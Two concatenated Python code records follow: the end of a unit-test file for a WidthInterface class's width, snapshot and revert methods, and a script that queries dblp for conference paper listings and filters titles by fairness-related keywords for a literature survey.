assert match is not None
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test_update_width_and_skip_appending_exp(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
expression_data_util.empty_expression()
width_interface._update_width_and_skip_appending_exp(
value=ap.Int(300))
assert width_interface.width == 300
expression: str = expression_data_util.get_current_expression()
match: Optional[Match] = re.search(
pattern=(
rf'width\({var_names.INT}_.+?\)'
),
string=expression,
flags=re.MULTILINE)
assert match is None
width_interface._update_width_and_skip_appending_exp(
value=400)
assert width_interface.width == 400
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__initialize_width_if_not_initialized(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
width_interface._initialize_width_if_not_initialized()
assert width_interface.width == 0
width_interface.width = ap.Int(10)
width_interface._initialize_width_if_not_initialized()
assert width_interface.width == 10
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__make_snapshot(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
width_interface.width = ap.Int(10)
snapshot_name: str = 'snapshot_1'
width_interface._run_all_make_snapshot_methods(
snapshot_name=snapshot_name)
assert width_interface._width_snapshots[snapshot_name] == 10
width_interface.width = ap.Int(15)
width_interface._run_all_make_snapshot_methods(
snapshot_name=snapshot_name)
assert width_interface._width_snapshots[snapshot_name] == 10
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__revert(self) -> None:
width_interface: WidthInterface = WidthInterface()
width_interface.variable_name = 'test_width_interface'
width_interface.width = ap.Int(10)
snapshot_name: str = 'snapshot_1'
width_interface._run_all_make_snapshot_methods(
snapshot_name=snapshot_name)
width_interface.width = ap.Int(15)
width_interface._run_all_revert_methods(snapshot_name=snapshot_name)
assert width_interface.width == 10
width_interface.width = ap.Int(15)
width_interface._run_all_revert_methods(snapshot_name=snapshot_name)
assert width_interface.width == 15
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test__append_width_attr_linking_setting(self) -> None:
interface: WidthInterface = WidthInterface()
interface.variable_name = 'test_width_interface'
interface._initialize_width_if_not_initialized()
assert interface._attr_linking_stack['width'] == [ap.Int(0)]
[record footer: unlabeled per-file quality-signal metrics omitted]

--- next record ---
hexsha: bce506315f62266ddeaa67e0cc7d8d6332c2cb76 | size: 23851 | ext: py | lang: Python
path: dlfairness/other/get_paper_survey_list/dump_dblp.py
repo: lin-tan/fairness-variance @ 7f6aee23160707ffe78f429e5d960022ea1c9fe4, license BSD-3-Clause
stars / issues / forks: null (the same repo and path are listed for all three)
import web_utils
from pprint import pprint
import nltk
import re
import yaml
from pathlib import Path
import csv
import argparse
keywords = [
'fair',
'bias',
'discriminate',
'aware',
'balance',
'disparity',
'opportunity',
'audit',
'gender',
'stereotype',
'race',
'amplification'
]
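# The per-venue lists below mechanically instantiate a single URL template. A
# hypothetical helper (not present in the original script) could generate them
# instead; sketch only, derived from the template visible in the entries:
def _dblp_toc_url(stream, toc):
    # e.g. _dblp_toc_url('nips', 'nips2019') or _dblp_toc_url('sigsoft', 'fse2020')
    return f'https://dblp.org/search/publ/api?q=toc%3Adb/conf/{stream}/{toc}.bht%3A&h=1000&format=json'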
links = {
'NIPS': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/neurips2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/nips2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/nips2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/nips2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/nips/nips2016.bht%3A&h=1000&format=json'
],
'ICML': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icml/icml2016.bht%3A&h=1000&format=json'
],
'FSE': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2016.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2015.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2014.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2013.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2012.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2011.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2010.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2009.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2008.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2007.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2006.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2005.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2004.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2003.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2002.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2001.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse2000.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/esec/esec99.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse98.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/esec/esec97.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse96.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/esec/esec95.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/sigsoft/fse94.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/esec/esec93.bht%3A&h=1000&format=json'
],
'ICSE': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2016.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2014.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2013.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2012.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2011.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2009.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2008.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2007.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2006.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2005.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2004.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2003.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2002.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2001.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse2000.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse99.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse98.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse97.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse96.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse95.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse94.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse93.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse92.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse91.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse90.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse89.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse88.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse87.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse86.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse85.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse84.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse83.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse82.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse81.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse80.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse79.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse78.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse77.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/icse76.bht%3A&h=1000&format=json'
],
'FairWare@ICSE': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/icse/fairware2018.bht%3A&h=1000&format=json'
],
'ISSTA': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2016.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2015.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2014.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2013.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2012.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2011.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2010.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2009.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2008.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2007.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2006.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2005.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2004.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2003.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2002.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2001.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta2000.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta98.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta96.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta94.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/issta93.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/tav91.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/issta/tav89.bht%3A&h=1000&format=json'
],
'ASE': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2016.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2015.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2014.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2013.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2012.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2011.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2010.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2009.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2008.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2007.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2006.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2005.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2004.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2003.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2002.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2001.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase2000.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase1999.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase1998.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/ase1997.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1996.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1995.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1994.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1993.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1992.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/kbse/kbse1991.bht%3A&h=1000&format=json'
],
'ACL': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2019-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2018-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2017-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2016-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2018-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2017-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/acl/acl2016-2.bht%3A&h=1000&format=json'
],
'EMNLP': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2020-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2019-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/emnlp/emnlp2016.bht%3A&h=1000&format=json'
],
'AAAI': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/aaai/aaai2016.bht%3A&h=1000&format=json'
],
'CVPR': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2020.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2017.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/cvpr/cvpr2016.bht%3A&h=1000&format=json'
],
'ICCV': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/iccv/iccv2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/iccv/iccv2017.bht%3A&h=1000&format=json'
],
'ECCV': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-3.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-4.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-5.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-6.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-7.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-8.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-9.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-10.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-11.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-12.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-13.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-14.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-15.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-16.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-17.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-18.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-19.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-20.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-21.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-22.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-23.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-24.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-25.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-26.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-27.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-28.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-29.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2020-30.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-3.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-4.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-5.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-6.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-7.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-8.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-9.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-10.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-11.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-12.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-13.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-14.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-15.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2018-16.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-1.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-2.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-3.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-4.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-5.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-6.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-7.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/eccv/eccv2016-8.bht%3A&h=1000&format=json'
],
'FAT': [
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/fat/fat2018.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/fat/fat2019.bht%3A&h=1000&format=json',
'https://dblp.org/search/publ/api?q=toc%3Adb/conf/fat/fat2020.bht%3A&h=1000&format=json'
]
}
def normalize_word(s):
    # Strip non-word characters, lowercase, and stem so that keyword
    # matching is robust to punctuation and inflection.
    stemmer = nltk.stem.SnowballStemmer('english')
    s = re.sub(r'\W+', '', s)
    s = s.lower()
    return stemmer.stem(s)
def title_match(title, keywords):
    # A title matches if any keyword, after normalization, appears among
    # the normalized title tokens; split() also swallows repeated spaces.
    title_list = [normalize_word(e) for e in title.split()]
    for keyword in keywords:
        if normalize_word(keyword) in title_list:
            return True
    return False
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--conf', type=str)
args = parser.parse_args()
conf = args.conf
link_list = links[conf]
for i, conf_link in enumerate(link_list):
print("Start:", conf_link)
        paper_dict = web_utils.get_dblp_venue(conf_link)
p = Path('./dump', conf)
p.mkdir(exist_ok=True, parents=True)
with open(str(Path(p, str(i) + '.yaml')), 'w') as f:
yaml.safe_dump(paper_dict, f)
if __name__ == "__main__":
main()
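The script assumes a web_utils.get_dblp_venue helper defined elsewhere in the repository. A minimal sketch of what such a helper could look like, assuming only the documented shape of dblp's search API response (result.hits.hit, each hit carrying an info record); this is an illustration, not the repository's actual implementation:

import requests

def get_dblp_venue(url):
    # Hypothetical stand-in for web_utils.get_dblp_venue; assumes dblp's
    # JSON layout: {"result": {"hits": {"hit": [{"info": {...}}, ...]}}}.
    resp = requests.get(url, timeout=30)
    resp.raise_for_status()
    hits = resp.json().get('result', {}).get('hits', {}).get('hit', [])
    # Map each paper title to its info record (authors, venue, year, ...).
    return {h.get('info', {}).get('title', ''): h.get('info', {}) for h in hits}

Invoked as, for example, --conf ISSTA, the script then dumps one YAML file per venue page under ./dump/ISSTA/.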
| 75.003145
| 103
| 0.678462
| 4,223
| 23,851
| 3.824769
| 0.073644
| 0.123143
| 0.16419
| 0.246285
| 0.874133
| 0.874133
| 0.859274
| 0.856674
| 0.856674
| 0.856674
| 0
| 0.104299
| 0.104775
| 23,851
| 317
| 104
| 75.239748
| 0.652164
| 0
| 0
| 0.043333
| 0
| 0.736667
| 0.82986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01
| false
| 0
| 0.026667
| 0
| 0.046667
| 0.006667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
